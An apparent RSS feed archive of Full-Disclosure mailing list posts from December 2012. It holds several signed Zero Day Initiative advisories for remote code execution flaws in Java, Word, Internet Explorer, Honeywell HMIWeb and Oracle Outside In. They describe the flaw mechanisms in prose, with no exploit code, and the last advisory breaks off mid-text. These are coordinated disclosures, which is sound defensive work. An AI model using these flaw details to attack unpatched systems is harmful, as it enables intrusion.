The ZDI is unique in how the acquired vulnerability information is<br />
used. TippingPoint does not re-sell the vulnerability details or any<br />
exploit code. Instead, upon notifying the affected product vendor,<br />
TippingPoint provides its customers with zero day protection through<br />
its intrusion prevention technology. Explicit details regarding the<br />
specifics of the vulnerability are not exposed to any parties until<br />
an official vendor patch is publicly available. Furthermore, with the<br />
altruistic aim of helping to secure a broader user base, TippingPoint<br />
provides this vulnerability information confidentially to security<br />
vendors (including competitors) who have a vulnerability protection or<br />
mitigation product.<br />
<br />
<br />
Our vulnerability disclosure policy is available online at:<br />
<br />
[<a href="https://lists.grok.org.uk/mailman/listinfo/full-disclosure"  rel="nofollow">lists.grok.org.uk</a>]<br />
<br />
<br />
Follow the ZDI on Twitter:<br />
<br />
[<a href="https://lists.grok.org.uk/mailman/listinfo/full-disclosure"  rel="nofollow">lists.grok.org.uk</a>]<br />
<br />
<br />
-----BEGIN PGP SIGNATURE-----<br />
Version: PGP Desktop 10.2.0 (Build 1950)<br />
Charset: utf-8<br />
<br />
<br />
wsBVAwUBUNRZJlVtgMGTo1scAQK79gf+JjzJEnHzMsddv86rxWEgVxgPaHb+Ih0N<br />
2OT1aPxDpHIDBA3hZg6iAGMuQVYj8Ot623NsLWKyAM7dpdEcaHgifW8zgThyEhdP<br />
m5eMslAOkuQ93NuqQqL4HAm0L6caNHQJ6Eqwn3Skg0UC5osJrH3SWmagLSGaiLJ1<br />
SlfYD3CxbI/NeShIV93lSRqRXvqIf9wFsQrXNoJgw0shlJw3MBe+t4/NX5wt5fba<br />
Vo/5BtmcpHZQawOd8FMmwoggvfhkoFc5BE1nncZSSfWCpeZ1raIUAmIFwZVj4THy<br />
91GD++j9PKHc4QYJO2FVrlA0xJqXrSehz2XSLb/z9QZeCk3S1lKBGg==<br />
=P609<br />
-----END PGP SIGNATURE-----<br />
<br />
<br />
-------------- next part --------------<br />
An HTML attachment was scrubbed...<br />
URL: [<a href="https://lists.grok.org.uk/mailman/listinfo/full-disclosure"  rel="nofollow">lists.grok.org.uk</a>] <br />
<br />
------------------------------<br />
<br />
<br />
Message: 10<br />
Date: Fri, 21 Dec 2012 06:43:39 -0600<br />
From: ZDI Disclosures &lt;full-disclosure@lists.grok.org.uk&gt;<br />
Subject: [Full-disclosure] ZDI-12-197 : Oracle Java<br />
java.beans.Statement Remote Code Execution Vulnerability<br />
To: Full Disclosure &lt;full-disclosure@lists.grok.org.uk&gt;, BugTraq<br />
&lt;full-disclosure@lists.grok.org.uk&gt;, <a href="mailto:&#102;&#117;&#108;&#108;&#45;&#100;&#105;&#115;&#99;&#108;&#111;&#115;&#117;&#114;&#101;&#64;&#108;&#105;&#115;&#116;&#115;&#46;&#103;&#114;&#111;&#107;&#46;&#111;&#114;&#103;&#46;&#117;&#107;">&#102;&#117;&#108;&#108;&#45;&#100;&#105;&#115;&#99;&#108;&#111;&#115;&#117;&#114;&#101;&#64;&#108;&#105;&#115;&#116;&#115;&#46;&#103;&#114;&#111;&#107;&#46;&#111;&#114;&#103;&#46;&#117;&#107;</a><br />
Message-ID: &lt;full-disclosure@lists.grok.org.uk&gt;<br />
Content-Type: text/plain; charset=&quot;iso-8859-1&quot;<br />
<br />
<br />
-----BEGIN PGP SIGNED MESSAGE-----<br />
Hash: SHA1<br />
<br />
<br />
ZDI-12-197 : Oracle Java java.beans.Statement Remote Code Execution<br />
Vulnerability<br />
<br />
[<a href="https://lists.grok.org.uk/mailman/listinfo/full-disclosure"  rel="nofollow">lists.grok.org.uk</a>]<br />
<br />
December 21, 2012<br />
<br />
<br />
- -- CVE ID:<br />
CVE-2012-1682<br />
<br />
<br />
- -- CVSS:<br />
9, AV:N/AC:L/Au:N/C:P/I:P/A:C<br />
<br />
<br />
- -- Affected Vendors:<br />
Oracle<br />
<br />
<br />
- -- Affected Products:<br />
Oracle Java Runtime<br />
<br />
<br />
- -- Vulnerability Details:<br />
This vulnerability allows remote attackers to execute arbitrary code on<br />
vulnerable installations of Oracle Java. User interaction is required to<br />
exploit this vulnerability in that the target must visit a malicious page<br />
or open a malicious file.<br />
<br />
<br />
The specific flaw exists within the java.beans.Expression class. Due to<br />
unsafe handling of reflection of privileged classes inside the Expression<br />
class it is possible for untrusted code to gain access to privileged<br />
methods and properties. This can result in remote code execution under the<br />
context of the current process.<br />
<br />
<br />
- -- Vendor Response:<br />
Oracle has issued an update to correct this vulnerability. More details can<br />
be found at:<br />
<br />
[<a href="https://lists.grok.org.uk/mailman/listinfo/full-disclosure"  rel="nofollow">lists.grok.org.uk</a>]<br />
<br />
15.html<br />
<br />
<br />
<br />
- -- Disclosure Timeline:<br />
2012-07-24 - Vulnerability reported to vendor<br />
2012-12-21 - Coordinated public release of advisory<br />
<br />
<br />
- -- Credit:<br />
This vulnerability was discovered by:<br />
* James Forshaw (tyranid)<br />
<br />
<br />
<br />
- -- About the Zero Day Initiative (ZDI):<br />
Established by TippingPoint, The Zero Day Initiative (ZDI) represents<br />
a best-of-breed model for rewarding security researchers for responsibly<br />
disclosing discovered vulnerabilities.<br />
<br />
<br />
Researchers interested in getting paid for their security research<br />
through the ZDI can find more information and sign-up at:<br />
<br />
[<a href="https://lists.grok.org.uk/mailman/listinfo/full-disclosure"  rel="nofollow">lists.grok.org.uk</a>]<br />
<br />
<br />
The ZDI is unique in how the acquired vulnerability information is<br />
used. TippingPoint does not re-sell the vulnerability details or any<br />
exploit code. Instead, upon notifying the affected product vendor,<br />
TippingPoint provides its customers with zero day protection through<br />
its intrusion prevention technology. Explicit details regarding the<br />
specifics of the vulnerability are not exposed to any parties until<br />
an official vendor patch is publicly available. Furthermore, with the<br />
altruistic aim of helping to secure a broader user base, TippingPoint<br />
provides this vulnerability information confidentially to security<br />
vendors (including competitors) who have a vulnerability protection or<br />
mitigation product.<br />
<br />
<br />
Our vulnerability disclosure policy is available online at:<br />
<br />
[<a href="https://lists.grok.org.uk/mailman/listinfo/full-disclosure"  rel="nofollow">lists.grok.org.uk</a>]<br />
<br />
<br />
Follow the ZDI on Twitter:<br />
<br />
[<a href="https://lists.grok.org.uk/mailman/listinfo/full-disclosure"  rel="nofollow">lists.grok.org.uk</a>]<br />
<br />
<br />
-----BEGIN PGP SIGNATURE-----<br />
Version: PGP Desktop 10.2.0 (Build 1950)<br />
Charset: utf-8<br />
<br />
<br />
wsBVAwUBUNRZdVVtgMGTo1scAQKYuAf8C4LTqhJ1Bk+usVtZ2mRjALe7+gTVvTk6<br />
j/q9Zqy/XsimBYXIiJW2QRt+CJqS/9e/8M+xH14FkSmZRGhHDaVR0tZ8cTuHPopm<br />
C3XnhzIJOk9XdoA8HdHVnMmd7vACA+ILyAX4n8feDHDHqUH7eTBZ3zdILxNTidQi<br />
cZgB67wqsOtsl8shsblGivkRWzlcheIC5492M17wwCr+PgMcg9xtSp3uD7MbNsNL<br />
BSOojIqMEhEhzDZ8P2wOBcSMN1EaSAxJYhHAI+ABfdp8LZ9IJt6GfIfoyzf34GQY<br />
dE7XrJMm0BVfd6oHQaArEcH6sI6XPU7RlMVJNvXUH4XuJH9Qww/lRw==<br />
=TyDY<br />
-----END PGP SIGNATURE-----<br />
<br />
<br />
-------------- next part --------------<br />
An HTML attachment was scrubbed...<br />
URL: [<a href="https://lists.grok.org.uk/mailman/listinfo/full-disclosure"  rel="nofollow">lists.grok.org.uk</a>] <br />
<br />
------------------------------<br />
<br />
_______________________________________________<br />
<br />
Full-Disclosure - We believe in it.<br />
Charter: [<a href="https://lists.grok.org.uk/mailman/listinfo/full-disclosure"  rel="nofollow">lists.grok.org.uk</a>]<br />
Hosted and sponsored by Secunia - [<a href="https://lists.grok.org.uk/mailman/listinfo/full-disclosure"  rel="nofollow">lists.grok.org.uk</a>]<br />
<br />
<br />
End of Full-Disclosure Digest, Vol 94, Issue 27<br />
<br />
***********************************************<br />
<br />
<br />
<br />
_______________________________________________<br />
Full-Disclosure - We believe in it.<br />
Charter: [<a href="http://lists.grok.org.uk/full-disclosure-charter.html"  rel="nofollow">lists.grok.org.uk</a>]<br />
Hosted and sponsored by Secunia - [<a href="http://secunia.com/"  rel="nofollow">secunia.com</a>]]]></description>
            <dc:creator>Anonymous User</dc:creator>
            <category>Full-Disclosure</category>
            <pubDate>Fri, 21 Dec 2012 23:52:47 +0800</pubDate>
        </item>
        <item>
            <guid>http://choon.net/forum/read.php?23,1687969,1687969#msg-1687969</guid>
            <title>[Full-disclosure] ZDI-12-201 : Microsoft Office Word PAPX Section Remote Code Execution Vulnerability (no replies)</title>
            <link>http://choon.net/forum/read.php?23,1687969,1687969#msg-1687969</link>
            <description><![CDATA[ -----BEGIN PGP SIGNED MESSAGE-----<br />
Hash: SHA1<br />
<br />
ZDI-12-201 : Microsoft Office Word PAPX Section Remote Code Execution<br />
Vulnerability<br />
[<a href="http://www.zerodayinitiative.com/advisories/ZDI-12-201"  rel="nofollow">www.zerodayinitiative.com</a>]<br />
December 21, 2012<br />
<br />
- -- CVE ID:<br />
CVE-2012-0182<br />
<br />
- -- CVSS:<br />
7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P<br />
<br />
- -- Affected Vendors:<br />
Microsoft<br />
<br />
<br />
- -- Affected Products:<br />
Microsoft Office Word<br />
<br />
<br />
- -- TippingPoint(TM) IPS Customer Protection:<br />
TippingPoint IPS customers have been protected against this<br />
vulnerability by Digital Vaccine protection filter ID 11933.<br />
For further product information on the TippingPoint IPS, visit:<br />
<br />
     [<a href="http://www.tippingpoint.com"  rel="nofollow">www.tippingpoint.com</a>]<br />
<br />
- -- Vulnerability Details:<br />
This vulnerability allows remote attackers to execute arbitrary code on<br />
vulnerable installations of Microsoft Office Word. User interaction is<br />
required to exploit this vulnerability in that the target must visit a<br />
malicious page or open a malicious file.<br />
<br />
The specific flaw exists within how the application parses a PAPX FKP<br />
sections. When parsing a PAPX FKP section, the application will store a<br />
calculation. However, when repairing a damaged document, the application<br />
will explicitly trust this calculation in a loop that is used to index into<br />
an array of objects. This will allow for an out-of-bounds access of an<br />
object which can lead to code execution under the context of the<br />
application.<br />
<br />
- -- Vendor Response:<br />
Microsoft has issued an update to correct this vulnerability. More details<br />
can be found at:<br />
[<a href="http://technet.microsoft.com/en-us/security/bulletin/ms12-064"  rel="nofollow">technet.microsoft.com</a>]<br />
<br />
<br />
<br />
- -- Disclosure Timeline:<br />
2011-05-25 - Vulnerability reported to vendor<br />
2012-12-21 - Coordinated public release of advisory<br />
<br />
<br />
- -- Credit:<br />
This vulnerability was discovered by:<br />
* Anonymous<br />
<br />
<br />
- -- About the Zero Day Initiative (ZDI):<br />
Established by TippingPoint, The Zero Day Initiative (ZDI) represents<br />
a best-of-breed model for rewarding security researchers for responsibly<br />
disclosing discovered vulnerabilities.<br />
<br />
Researchers interested in getting paid for their security research<br />
through the ZDI can find more information and sign-up at:<br />
<br />
     [<a href="http://www.zerodayinitiative.com"  rel="nofollow">www.zerodayinitiative.com</a>]<br />
<br />
The ZDI is unique in how the acquired vulnerability information is<br />
used. TippingPoint does not re-sell the vulnerability details or any<br />
exploit code. Instead, upon notifying the affected product vendor,<br />
TippingPoint provides its customers with zero day protection through<br />
its intrusion prevention technology. Explicit details regarding the<br />
specifics of the vulnerability are not exposed to any parties until<br />
an official vendor patch is publicly available. Furthermore, with the<br />
altruistic aim of helping to secure a broader user base, TippingPoint<br />
provides this vulnerability information confidentially to security<br />
vendors (including competitors) who have a vulnerability protection or<br />
mitigation product.<br />
<br />
Our vulnerability disclosure policy is available online at:<br />
<br />
     [<a href="http://www.zerodayinitiative.com/advisories/disclosure_policy/"  rel="nofollow">www.zerodayinitiative.com</a>]<br />
<br />
Follow the ZDI on Twitter:<br />
<br />
     [<a href="http://twitter.com/thezdi"  rel="nofollow">twitter.com</a>]<br />
<br />
-----BEGIN PGP SIGNATURE-----<br />
Version: PGP Desktop 10.2.0 (Build 1950)<br />
Charset: utf-8<br />
<br />
wsBVAwUBUNRa+VVtgMGTo1scAQLlWAf+Jjl7W056kyGU3AGbmPhW1+dd3b0Skh3Q<br />
EHGGJtrR4sGu5g2GaluVqSd7JZA0zbTzZhKgj4IuC8xfThtAfeU/5EuF7eX7LEXz<br />
vz92fQDx9ulv41tFLw81nTR9yk63Baq93CT6FwszPF5Edr9jrVyw/havhU5OgoFp<br />
vsknQnmDyIyXXkYN0iRWEKhDmopssY1Mnmj1ZvrKtYc8lRUd7p9vD8PQ8P6in9pS<br />
0IoENc3SoKb4CDbAUY1PVjbeAF0+3sHjG95DNoycmFsRc8xvw1eJwW9vx5EvRAwU<br />
JsUTdLb/LK81dB+PNoov3feYNOUAwaLHW5vQX6ybOS02MHEfyMozCg==<br />
=ooOU<br />
-----END PGP SIGNATURE-----<br />
<br />
_______________________________________________<br />
Full-Disclosure - We believe in it.<br />
Charter: [<a href="http://lists.grok.org.uk/full-disclosure-charter.html"  rel="nofollow">lists.grok.org.uk</a>]<br />
Hosted and sponsored by Secunia - [<a href="http://secunia.com/"  rel="nofollow">secunia.com</a>]]]></description>
            <dc:creator>ZDI Disclosures</dc:creator>
            <category>Full-Disclosure</category>
            <pubDate>Fri, 21 Dec 2012 21:04:30 +0800</pubDate>
        </item>
        <item>
            <guid>http://choon.net/forum/read.php?23,1687940,1687940#msg-1687940</guid>
            <title>[Full-disclosure] ZDI-12-203 : Honeywell HMIWeb Browser ActiveX Control RequestDSPLoad Remote Code Execution Vulnerability (no replies)</title>
            <link>http://choon.net/forum/read.php?23,1687940,1687940#msg-1687940</link>
            <description><![CDATA[ -----BEGIN PGP SIGNED MESSAGE-----<br />
Hash: SHA1<br />
<br />
ZDI-12-203 : Honeywell HMIWeb Browser ActiveX Control RequestDSPLoad Remote<br />
Code Execution Vulnerability<br />
[<a href="http://www.zerodayinitiative.com/advisories/ZDI-12-203"  rel="nofollow">www.zerodayinitiative.com</a>]<br />
December 21, 2012<br />
<br />
- -- CVE ID:<br />
CVE-2012-2054<br />
<br />
- -- CVSS:<br />
7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P<br />
<br />
- -- Affected Vendors:<br />
Honeywell<br />
<br />
- -- Affected Products:<br />
Honeywell HMIWeb<br />
<br />
<br />
- -- TippingPoint(TM) IPS Customer Protection:<br />
TippingPoint IPS customers have been protected against this<br />
vulnerability by Digital Vaccine protection filter ID 11490.<br />
For further product information on the TippingPoint IPS, visit:<br />
<br />
     [<a href="http://www.tippingpoint.com"  rel="nofollow">www.tippingpoint.com</a>]<br />
<br />
- -- Vulnerability Details:<br />
This vulnerability allows remote attackers to execute arbitrary code on<br />
vulnerable installations of Honeywell HMIWeb. User interaction is required<br />
to exploit this vulnerability in that the target must visit a malicious<br />
page or open a malicious file.<br />
<br />
The specific flaw exists within the ActiveX control defined within the<br />
HSCDSPRenderDll.dll file. The RequestDSPLoad method does not properly<br />
verify the length of a supplied argument before copying it into a<br />
fixed-length heap buffer. A remote attacker can abuse this to execute<br />
arbitrary code under the context of the user running the browser.<br />
<br />
- -- Vendor Response:<br />
Honeywell states:<br />
[<a href="http://www.us-cert.gov/control_systems/pdf/ICSA-12-150-01.pdf"  rel="nofollow">www.us-cert.gov</a>]<br />
<br />
<br />
- -- Disclosure Timeline:<br />
2011-11-23 - Vulnerability reported to vendor<br />
2012-12-21 - Coordinated public release of advisory<br />
<br />
- -- Credit:<br />
This vulnerability was discovered by:<br />
* Anonymous<br />
<br />
<br />
- -- About the Zero Day Initiative (ZDI):<br />
Established by TippingPoint, The Zero Day Initiative (ZDI) represents<br />
a best-of-breed model for rewarding security researchers for responsibly<br />
disclosing discovered vulnerabilities.<br />
<br />
Researchers interested in getting paid for their security research<br />
through the ZDI can find more information and sign-up at:<br />
<br />
     [<a href="http://www.zerodayinitiative.com"  rel="nofollow">www.zerodayinitiative.com</a>]<br />
<br />
The ZDI is unique in how the acquired vulnerability information is<br />
used. TippingPoint does not re-sell the vulnerability details or any<br />
exploit code. Instead, upon notifying the affected product vendor,<br />
TippingPoint provides its customers with zero day protection through<br />
its intrusion prevention technology. Explicit details regarding the<br />
specifics of the vulnerability are not exposed to any parties until<br />
an official vendor patch is publicly available. Furthermore, with the<br />
altruistic aim of helping to secure a broader user base, TippingPoint<br />
provides this vulnerability information confidentially to security<br />
vendors (including competitors) who have a vulnerability protection or<br />
mitigation product.<br />
<br />
Our vulnerability disclosure policy is available online at:<br />
<br />
     [<a href="http://www.zerodayinitiative.com/advisories/disclosure_policy/"  rel="nofollow">www.zerodayinitiative.com</a>]<br />
<br />
Follow the ZDI on Twitter:<br />
<br />
     [<a href="http://twitter.com/thezdi"  rel="nofollow">twitter.com</a>]<br />
<br />
-----BEGIN PGP SIGNATURE-----<br />
Version: PGP Desktop 10.2.0 (Build 1950)<br />
Charset: utf-8<br />
<br />
wsBVAwUBUNRbzFVtgMGTo1scAQKiCwgAoxez+OmYBC/g4SrLZ087spc8UA8fa9K0<br />
eAdCpN0+rQ5MeJJQt4/ndN9x138HIEqRFUECf+pkNExG9KOGgrn3nI3n06Lig1w+<br />
HtKwTSeYatzo7fLdTwT/9yp5rXsi31o2yUsxFYnDLLHTA9ElGQTWa/RHLKYUHafi<br />
AltA6yv4PfgvlJx2DJbPiwrBSMgg0kQGRc2o/g9lvjltLvXoYnFQQKoHRsTQdGcY<br />
LP8Ki5emZcqf675IJ5VWi0a+TG43UMXb/wwsooK5EB8CycqvGrq/+9Mr/xh0FBlq<br />
Ej7BDhk9LjLZ+wtgJIjG2Z+CzhzdSpBSx58q8sscRS5gL6JxpzY51g==<br />
=PNOJ<br />
-----END PGP SIGNATURE-----<br />
<br />
_______________________________________________<br />
Full-Disclosure - We believe in it.<br />
Charter: [<a href="http://lists.grok.org.uk/full-disclosure-charter.html"  rel="nofollow">lists.grok.org.uk</a>]<br />
Hosted and sponsored by Secunia - [<a href="http://secunia.com/"  rel="nofollow">secunia.com</a>]]]></description>
            <dc:creator>ZDI Disclosures</dc:creator>
            <category>Full-Disclosure</category>
            <pubDate>Fri, 21 Dec 2012 20:56:34 +0800</pubDate>
        </item>
        <item>
            <guid>http://choon.net/forum/read.php?23,1687939,1687939#msg-1687939</guid>
            <title>[Full-disclosure] ZDI-12-192 : Microsoft Internet Explorer insertRow Remote Code Execution Vulnerability (no replies)</title>
            <link>http://choon.net/forum/read.php?23,1687939,1687939#msg-1687939</link>
            <description><![CDATA[ -----BEGIN PGP SIGNED MESSAGE-----<br />
Hash: SHA1<br />
<br />
ZDI-12-192 : Microsoft Internet Explorer insertRow Remote Code Execution<br />
Vulnerability<br />
[<a href="http://www.zerodayinitiative.com/advisories/ZDI-12-192"  rel="nofollow">www.zerodayinitiative.com</a>]<br />
December 21, 2012<br />
<br />
- -- CVE ID:<br />
CVE-2012-1880<br />
<br />
- -- CVSS:<br />
7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P<br />
<br />
- -- Affected Vendors:<br />
Microsoft<br />
<br />
- -- Affected Products:<br />
Microsoft Internet Explorer<br />
<br />
<br />
- -- TippingPoint(TM) IPS Customer Protection:<br />
TippingPoint IPS customers have been protected against this<br />
vulnerability by Digital Vaccine protection filter ID 12382.<br />
For further product information on the TippingPoint IPS, visit:<br />
<br />
     [<a href="http://www.tippingpoint.com"  rel="nofollow">www.tippingpoint.com</a>]<br />
<br />
- -- Vulnerability Details:<br />
This vulnerability allows remote attackers to execute arbitrary code on<br />
vulnerable installations of Microsoft Internet Explorer. User interaction<br />
is required to exploit this vulnerability in that the target must visit a<br />
malicious page or open a malicious file.<br />
<br />
The specific flaw exists within the way Internet Explorer handles<br />
consecutive calls to insertRow. When the number of rows reaches a certain<br />
threshold the program fails to correctly relocate certain key objects. This<br />
can lead to a use-after-free vulnerability which can result in remote code<br />
execution under the context of the current process.<br />
<br />
- -- Vendor Response:<br />
Microsoft has issued an update to correct this vulnerability. More details<br />
can be found at:<br />
[<a href="https://technet.microsoft.com/en-us/security/bulletin/ms12-037"  rel="nofollow">technet.microsoft.com</a>]<br />
<br />
<br />
- -- Disclosure Timeline:<br />
2012-03-14 - Vulnerability reported to vendor<br />
2012-12-21 - Coordinated public release of advisory<br />
<br />
- -- Credit:<br />
This vulnerability was discovered by:<br />
* Anonymous<br />
<br />
<br />
- -- About the Zero Day Initiative (ZDI):<br />
Established by TippingPoint, The Zero Day Initiative (ZDI) represents<br />
a best-of-breed model for rewarding security researchers for responsibly<br />
disclosing discovered vulnerabilities.<br />
<br />
Researchers interested in getting paid for their security research<br />
through the ZDI can find more information and sign-up at:<br />
<br />
     [<a href="http://www.zerodayinitiative.com"  rel="nofollow">www.zerodayinitiative.com</a>]<br />
<br />
The ZDI is unique in how the acquired vulnerability information is<br />
used. TippingPoint does not re-sell the vulnerability details or any<br />
exploit code. Instead, upon notifying the affected product vendor,<br />
TippingPoint provides its customers with zero day protection through<br />
its intrusion prevention technology. Explicit details regarding the<br />
specifics of the vulnerability are not exposed to any parties until<br />
an official vendor patch is publicly available. Furthermore, with the<br />
altruistic aim of helping to secure a broader user base, TippingPoint<br />
provides this vulnerability information confidentially to security<br />
vendors (including competitors) who have a vulnerability protection or<br />
mitigation product.<br />
<br />
Our vulnerability disclosure policy is available online at:<br />
<br />
     [<a href="http://www.zerodayinitiative.com/advisories/disclosure_policy/"  rel="nofollow">www.zerodayinitiative.com</a>]<br />
<br />
Follow the ZDI on Twitter:<br />
<br />
     [<a href="http://twitter.com/thezdi"  rel="nofollow">twitter.com</a>]<br />
<br />
-----BEGIN PGP SIGNATURE-----<br />
Version: PGP Desktop 10.2.0 (Build 1950)<br />
Charset: utf-8<br />
<br />
wsBVAwUBUNRXqlVtgMGTo1scAQIolwgAlfWawonK1BetraIK8viDhg/z4Eb5RTse<br />
hOfWDOxNdY0glskLeI1ylrtr0nXJSvj+8q5T6DcsEaz48nEdsv/ObO+d6JREzwTL<br />
3gUJ9fUeMWZubmUmm2cKkgdenmEkK0p8EZqQ5puUpuVffeFC/f8Dn679MGlwL73v<br />
Zato0rHoJuBedfxOYsQ+UkYwre97ickYkw/dl0LMgce5IRxKROnsR3u4+yPUVOWt<br />
Vqo0zEPXKGdPUY3L/AjgowwqvOGsf0OmQESBLZi+pGhO2PxWjb5aBm+gFPBkRpNl<br />
ON1yduQfblrmsrCEHZf/od/A/r7YyLeI4dxkOGb0vR7FmBr2OcZfBA==<br />
=/GjQ<br />
-----END PGP SIGNATURE-----<br />
<br />
_______________________________________________<br />
Full-Disclosure - We believe in it.<br />
Charter: [<a href="http://lists.grok.org.uk/full-disclosure-charter.html"  rel="nofollow">lists.grok.org.uk</a>]<br />
Hosted and sponsored by Secunia - [<a href="http://secunia.com/"  rel="nofollow">secunia.com</a>]]]></description>
            <dc:creator>ZDI Disclosures</dc:creator>
            <category>Full-Disclosure</category>
            <pubDate>Fri, 21 Dec 2012 20:56:34 +0800</pubDate>
        </item>
        <item>
            <guid>http://choon.net/forum/read.php?23,1687938,1687938#msg-1687938</guid>
            <title>[Full-disclosure] ZDI-12-202 : Oracle Outside In WordPerfect File Processing Remote Code Execution Vulnerability (no replies)</title>
            <link>http://choon.net/forum/read.php?23,1687938,1687938#msg-1687938</link>
            <description><![CDATA[ -----BEGIN PGP SIGNED MESSAGE-----<br />
Hash: SHA1<br />
<br />
ZDI-12-202 :  Oracle Outside In WordPerfect File Processing Remote Code<br />
Execution Vulnerability<br />
[<a href="http://www.zerodayinitiative.com/advisories/ZDI-12-202"  rel="nofollow">www.zerodayinitiative.com</a>]<br />
December 21, 2012<br />
<br />
- -- CVE ID:<br />
<br />
<br />
- -- CVSS:<br />
10, AV:N/AC:L/Au:N/C:C/I:C/A:C<br />
<br />
- -- Affected Vendors:<br />
Oracle<br />
<br />
- -- Affected Products:<br />
Oracle Outside In<br />
<br />
<br />
- -- Vulnerability Details:<br />
This vulnerability allows remote attackers to execute arbitrary code on<br />
vulnerable products utilizing the Oracle Outside In technology. User<br />
interaction is required to exploit this vulnerability in that the target<br />
must visit a malicious page or open a malicious file.<br />
<br />
The specific flaw exists within the handling of WordPerfect files. When<br />
parsing font records the code within vswp5.dll does not validate the<br />
datasize value prior to performing arithmetic on it. The result is used to<br />
make a heap allocation<br />
that can be undersized which can be leveraged to corrupt memory leading to<br />
arbitrary code execution under the context of the user running the<br />
application.<br />
<br />
- -- Vendor Response:<br />
Oracle has issued an update to correct this vulnerability. More details can<br />
be found at:<br />
[<a href="http://www.oracle.com/technetwork/topics/security/cpuapr2012-366314.html"  rel="nofollow">www.oracle.com</a>]<br />
<br />
<br />
- -- Disclosure Timeline:<br />
2011-12-19 - Vulnerability reported to vendor<br />
2012-12-21 - Coordinated public release of advisory<br />
<br />
<br />
- -- Credit:<br />
This vulnerability was discovered by:<br />
* gwslabs.com<br />
<br />
<br />
- -- About the Zero Day Initiative (ZDI):<br />
Established by TippingPoint, The Zero Day Initiative (ZDI) represents<br />
a best-of-breed model for rewarding security researchers for responsibly<br />
disclosing discovered vulnerabilities.<br />
<br />
Researchers interested in getting paid for their security research<br />
through the ZDI can find more information and sign-up at:<br />
<br />
     [<a href="http://www.zerodayinitiative.com"  rel="nofollow">www.zerodayinitiative.com</a>]<br />
<br />
The ZDI is unique in how the acquired vulnerability information is<br />
used. TippingPoint does not re-sell the vulnerability details or any<br />
exploit code. Instead, upon notifying the affected product vendor,<br />
TippingPoint provides its customers with zero day protection through<br />
its intrusion prevention technology. Explicit details regarding the<br />
specifics of the vulnerability are not exposed to any parties until<br />
an official vendor patch is publicly available. Furthermore, with the<br />
altruistic aim of helping to secure a broader user base, TippingPoint<br />
provides this vulnerability information confidentially to security<br />
vendors (including competitors) who have a vulnerability protection or<br />
mitigation product.<br />
<br />
Our vulnerability disclosure policy is available online at:<br />
<br />
     [<a href="http://www.zerodayinitiative.com/advisories/disclosure_policy/"  rel="nofollow">www.zerodayinitiative.com</a>]<br />
<br />
Follow the ZDI on Twitter:<br />
<br />
     [<a href="http://twitter.com/thezdi"  rel="nofollow">twitter.com</a>]<br />
<br />
-----BEGIN PGP SIGNATURE-----<br />
Version: PGP Desktop 10.2.0 (Build 1950)<br />
Charset: utf-8<br />
<br />
wsBVAwUBUNRbS1VtgMGTo1scAQLtawf+NavpWL26tU6y1s3RFh81GzTU2csrKhs0<br />
dwA25lag4dNG6rFop9kYSqZStxLMoel3HZnk0M8xEQkLtNTzHL30FKtabUUFRYG+<br />
5oIZkP/xf8LbVCnrCwqwz+vpzQScYUpxFt9zn7gGkBeTJfmTygC5JLNR3k/j9NI7<br />
b2B5UKwuZRK6M0j8wwxeZ9MyDw4Khn4Jy8S+Mx2wnyiZH/MbeYJsK05SigXUthY/<br />
49tZGNy4JDAHITDoL8BkmLcrRWqgHpAaXB5+ad7vDuXy9IlXRCzrSsyvhf7p7CD6<br />
vR+a6rINBLS9lqXfF13nhLS/j/WqMJANLT6Nm6V846Oar4wRBcRDpQ==<br />
=9CB1<br />
-----END PGP SIGNATURE-----<br />
<br />
_______________________________________________<br />
Full-Disclosure - We believe in it.<br />
Charter: [<a href="http://lists.grok.org.uk/full-disclosure-charter.html"  rel="nofollow">lists.grok.org.uk</a>]<br />
Hosted and sponsored by Secunia - [<a href="http://secunia.com/"  rel="nofollow">secunia.com</a>]]]></description>
            <dc:creator>ZDI Disclosures</dc:creator>
            <category>Full-Disclosure</category>
            <pubDate>Fri, 21 Dec 2012 20:56:34 +0800</pubDate>
        </item>
        <item>
            <guid>http://choon.net/forum/read.php?23,1687937,1687937#msg-1687937</guid>
            <title>[Full-disclosure] ZDI-12-200 : Microsoft Internet Explorer 9 CTreeNode Remote Code Execution Vulnerability (no replies)</title>
            <link>http://choon.net/forum/read.php?23,1687937,1687937#msg-1687937</link>
            <description><![CDATA[ -----BEGIN PGP SIGNED MESSAGE-----<br />
Hash: SHA1<br />
<br />
ZDI-12-200 : Microsoft Internet Explorer 9 CTreeNode Remote Code Execution<br />
Vulnerability<br />
[<a href="http://www.zerodayinitiative.com/advisories/ZDI-12-200"  rel="nofollow">www.zerodayinitiative.com</a>]<br />
December 21, 2012<br />
<br />
- -- CVE ID:<br />
CVE-2012-2548<br />
<br />
- -- CVSS:<br />
7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P<br />
<br />
- -- Affected Vendors:<br />
Microsoft<br />
<br />
- -- Affected Products:<br />
Microsoft Internet Explorer 9<br />
<br />
<br />
- -- TippingPoint(TM) IPS Customer Protection:<br />
TippingPoint IPS customers have been protected against this<br />
vulnerability by Digital Vaccine protection filter ID 12584.<br />
For further product information on the TippingPoint IPS, visit:<br />
<br />
     [<a href="http://www.tippingpoint.com"  rel="nofollow">www.tippingpoint.com</a>]<br />
<br />
- -- Vulnerability Details:<br />
This vulnerability allows remote attackers to execute arbitrary code on<br />
vulnerable installations of Microsoft Internet Explorer. User interaction<br />
is required to exploit this vulnerability in that the target must visit a<br />
malicious page or open a malicious file.<br />
<br />
The specific flaw exists within the way Internet Explorer handles CTreeNode<br />
objects. By manipulating a document's elements an attacker can force a<br />
dangling pointer to be reused after it has been freed. The issue lies in a<br />
possible type confusion between a CTreeNode object and an ISpanQualifier<br />
instance during the layout of a document being performed. An attacker can<br />
leverage this vulnerability to execute code under the context of the<br />
current process.<br />
<br />
- -- Vendor Response:<br />
Microsoft has issued an update to correct this vulnerability. More details<br />
can be found at:<br />
[<a href="http://technet.microsoft.com/en-us/security/advisory/2757760"  rel="nofollow">technet.microsoft.com</a>]<br />
<br />
<br />
- -- Disclosure Timeline:<br />
2012-07-24 - Vulnerability reported to vendor<br />
2012-12-21 - Coordinated public release of advisory<br />
<br />
- -- Credit:<br />
This vulnerability was discovered by:<br />
* Stephen Fewer of Harmony Security (www.harmonysecurity.com)<br />
<br />
- -- About the Zero Day Initiative (ZDI):<br />
Established by TippingPoint, The Zero Day Initiative (ZDI) represents<br />
